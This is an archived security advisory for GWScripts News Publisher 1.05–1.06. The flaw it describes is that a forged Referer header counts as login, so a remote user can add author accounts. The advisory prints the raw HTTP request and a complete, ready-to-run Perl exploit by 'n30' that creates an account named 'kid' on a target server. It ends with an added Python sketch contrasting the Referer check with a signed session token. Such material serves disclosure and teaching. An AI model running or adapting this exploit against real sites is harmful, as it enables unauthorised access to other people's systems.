GWScripts News Publisher Author Index File Write Vulnerability

2008-04-09 04:32:17 Source: Internet

Published: 2000-08-31
Updated: 2000-08-31

Affected systems:

GWScripts News Publisher 1.06
GWScripts News Publisher 1.05b
GWScripts News Publisher 1.05a
GWScripts News Publisher 1.05

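Unaffected systems:

Description:

GWScripts News Publisher is web news publishing software. It contains a
vulnerability that allows a remote user to add an author to the author index
file (author.file). This is done by submitting the following HTTP request
with an arbitrary username and password: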

POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: user/browser
Host: target
Referer: http://target/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71

author=<username>&apassword=<password> \
&email=<email address>&name=<username>&password=<password>

<* Source: n30 (n30@cgi-experts.com) *>





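Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!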


#!/usr/bin/perl
#
# News Publisher EXPLOIT by n30
# Versions: tested on 1.05
# 1.05a
# 1.05b
# 1.06
# Bug Found By: me {n30}
# OS: Unix and Winnt
#
# The Problem:
# The author decided in all his 'enlightened wisdom'
# that if the HTTP_REFERER url is the same as the News Publisher
# news.cgi file. Then U have OBVIOUSLY logged in?
#
# Exploit:
# hmmm me thinks i should change the HTTP_REFERER to:
#
# http://www.server.com/cgi/news.cgi
#
# Using this exploit will add an author account with user kid
# and passwerd of ur choice.
#
# NOTE: There are more inventive ways to use this Vulnerability :)
# ie. maybe?? the Admin screen is protected by the HTTP_REFERER?
#
# n30@alldas.de
# www.alldas.de, defaced.alldas.de {trib's the webmaster not me!}
#
# Shoutz: trib, axess, domz, acidflame, raxie, and all who know me!
#

use strict;
use Socket;

print("\nNews Publisher EXPLOIT\n");
print("By: n30 {n30\@alldas.de}\n");
print("\nShoutz: trib, axess, domz, acidflame, raxie\n");

if (@ARGV < 3) {
print("\nUsage: $0 <target> <dir> <newpass>\n");
print("\n eg => ./sploit.pl www.example.com cgi-bin/news.cgi iisalamer\n");
exit(1);
}

(my $target,my $dir,my $newpass) = @ARGV;

# Setup Content-Length Header :)
my $length = 68 + (2 * length($newpass));

# Print BullShit
print("\nRemote host: $target\n");
print("CGI-script: $dir\n");
print("URL: http://$target/$dir\n");

# Setup URL Command
my $url =
"author=kid&apassword=$newpass&email=lamerz\@antionline.com&name=kid&password=$newpass";
print("URL Command: $url\n");
# Necessary to DE-Kiddie da werld :)
my $agent = "-=Attention Admin=- pLz n0te d0wn th1s IP and P4ss ont0 fBi";

my $sploit=
"POST /$dir?addAuthor HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Referer: http://$target/$dir
Content-type: application/x-www-form-urlencoded
Content-length: $length

$url";

my $iaddr = inet_aton($target) || die("Error: $!\n");
my $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
my $proto = getprotobyname('tcp') || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

print("\nWh0a chex0r: http://$target/$dir\nuser/pass: kid/$newpass\n");

exit(0);

#end of exploit
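
The script's comments attribute the flaw to treating a matching HTTP_REFERER as proof of login. The added example below (not code from the advisory or from News Publisher) models that Referer gate next to a gate that accepts only a server-signed session token; all function names, the `session` cookie name, the key handling and the sample URL are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

# Hypothetical names throughout; this models the check, it is not News Publisher code.
SECRET = secrets.token_bytes(32)  # server-side signing key, never sent to clients
SESSION_TTL = 900                 # seconds a login stays valid (constructed value)


def referer_gate(headers, script_url):
    """Flawed gate as described in the exploit comments: the client-supplied
    Referer header is treated as proof of a prior login."""
    return headers.get("Referer") == script_url


def issue_session(user, now=None):
    """Call only after the password has been verified server-side."""
    now = time.time() if now is None else now
    payload = f"{user}|{int(now) + SESSION_TTL}"
    sig = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"session={payload}|{sig}"


def session_gate(headers, now=None):
    """Hardened gate: return the logged-in user, or None. Referer is ignored;
    only a token signed with the server key and not yet expired is accepted."""
    now = time.time() if now is None else now
    cookie = headers.get("Cookie", "")
    if not cookie.startswith("session="):
        return None
    parts = cookie[len("session="):].rsplit("|", 2)
    if len(parts) != 3:
        return None
    user, expires, sig = parts
    expected = hmac.new(SECRET, f"{user}|{expires}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig.encode(), expected.encode()):
        return None
    if not expires.isdigit() or int(expires) < now:
        return None
    return user


# Constructed request headers: Referer matches the script, no login ever happened.
SCRIPT_URL = "http://news.example/cgi-bin/news/news.cgi"
UNAUTHENTICATED = {"Referer": SCRIPT_URL}
```

Every privileged action (addAuthor included) would call the session gate before touching author.file, so a request carrying only a matching Referer is rejected.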



Recommendation:

None at this time.



